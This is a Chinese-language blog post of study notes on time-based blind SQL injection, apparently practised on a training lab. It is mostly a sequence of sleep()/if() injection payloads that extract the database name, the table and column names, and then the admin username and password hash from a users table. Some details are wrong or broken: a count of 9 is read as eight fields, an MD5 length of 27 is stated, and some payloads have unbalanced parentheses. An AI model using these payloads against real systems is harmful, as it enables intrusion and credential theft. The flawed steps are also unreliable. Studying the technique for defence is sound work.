sql注入笔记：基于时间延迟的盲注

Posted 2021-04-11 SibomSun

“ 在陷入混乱的一瞬间，灯火、信仰、统统派不上用场。”

大致原理：

遇到一些可能没有报错或结果的疑似sql注入点，可以采用sleep函数延时和if判定的方式进行注入，应该属于盲注的一种，很好理解

就是猜对了就执行sleep，没对就不执行

使用到的函数：

sleep()

用法(语法)：sleep（duration）,其中duration的单位是秒。

ascii(string)

功能: 数据库字符集返回string的第一个字节的十进制表示。

substr(string,start [,length])

第一个参数为要处理的字符串，start为开始位置，length为截取的长度。

count(column_name)

函数返回指定列的值的数目(NULL 不计入)。

limit [offset,] rows

offset是偏移量，表示我们现在需要的数据是跳过多少行数据之后的，可以忽略；

rows表示我们现在要拿多少行数据。

IF( expr1 , expr2 , expr3 )

expr1 的值为 TRUE，则返回值为 expr2 

expr1 的值为FALSE，则返回值为 expr3

注入流程

1，常规手段判断注入点

1' and 1=1#

2,判断注入类型

1' and sleep(5) # #延迟1 and sleep(5) # #没有延迟 #所以得出存在字符型注入

3，猜解当前数据库名

猜解数据库名的长度：

1' and if(length(database())=1,sleep(5),1) # #没有延迟1' and if(length(database())=4,sleep(5),1) # #延迟 #说明数据库名长度为4个字符。

采用二分法猜解数据库名（传统艺能）：

1' and if(ascii(substr(database(),1,1))>97,sleep(5),1) # #延迟1' and if(ascii(substr(database(),1,1))<100,sleep(5),1)# #没有延迟1' and if(ascii(substr(database(),1,1))>100,sleep(5),1) # #没有延迟 #说明数据库的第一个字符为小写字母d(ASCII码：100） #重复上述步骤，就能猜解出数据库名。

4，猜解数据库的表名

先猜解数据库中表的数量：

1' and if((select count(table_name) from information_schema.tables where table_schema=database())=1,sleep(5),1) # #没有延迟1' and if(select count(table_name) from information_schema.tables where table_schema=database())=2,sleep(5),1) # #延迟 #说明数据库中有两个表。

接着猜解表名长度：

1' and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1,sleep(5),1) # #没有延迟1' and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9,sleep(5),1) # #延迟 #说明第一个表名的长度为9个字符。

然后猜解表名：

1' and if((select ascii(substr((select table_name from information_schema.tables where table_schema= database() limit 0,1),1,1)))>97,sleep(5),1) # #延迟1' and if((select ascii(substr((select table_name from information_schema.tables where table_schema= database() limit 0,1),1,1)))<100,sleep(5),1) # #没有延迟1' and if((select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))=103,sleep(5),1) # #延迟 #表名的第一个字符为g(ASCII码：103），照此方法依次猜出表名。例中，得出这两个表依次为：guestbook、users.

5，由表名猜字段名

先猜字段数：

1' and if((select count(column_name) from information_schema.columns where table_name= “users”)=1,sleep(5),1) # #没有延迟1' and if((select count(column_name) from information_schema.columns where table_name= “users”)=9,sleep(5),1) # #延迟 #说明users表有8个字段。

猜字段名

1' and if((select ascii(substr((select column_name from information_schema.columns where table_name=”users” limit 0,1),1,1)))>97, sleep(5),0) # #延迟1' and if((select ascii(substr((select column_name from information_schema.columns where table_name=”users” limit 0,1),1,1)))<105, sleep(5),0) # #延迟1' and if((select ascii(substr((select column_name from information_schema.columns where table_name=”users” limit 0,1),1,1)))=117, sleep(5),0) # #延迟 #依次类推可得表中所有字段名

例中：字段名为：user、password.

6，猜解user和password的值的长度

第一个用户名字符长

1' and if((select (length(substr((select user from users limit 0,1),1))=1) ,sleep(5),1) # #没有延迟1' and if((select (length(substr((select user from users limit 0,1),1))=5) ,sleep(5),1) # #延迟

第一个用户名的password的md5字段长

1' and if((select (length(substr((select password from users limit 0,1),1))=1) ,sleep(5),1) # #没有延迟1' and if((select (length(substr((select password from users limit 0,1),1))=27) ,sleep(5),1) # #延迟

第一个用户名：

1' and if(select ascii(substr((select user from users limit 0,1),1,1))>97,sleep(5),1) # 没有延迟1' and if(select ascii(substr((select user from users limit 0,1),1,1))=97,sleep(5),1) # 延迟 #依次猜解得第一个用户名为admin

第一个用户的密码

1' and if(select ascii(substr((select password from users limit 0,1),1,1))>97,sleep(5),1) # #没有延时1' and if(select ascii(substr((select password from users limit 0,1),1,1))=53,sleep(5),1) # #延时 #依次猜解密码的md5值

---

一键关注带来更多干货【也许】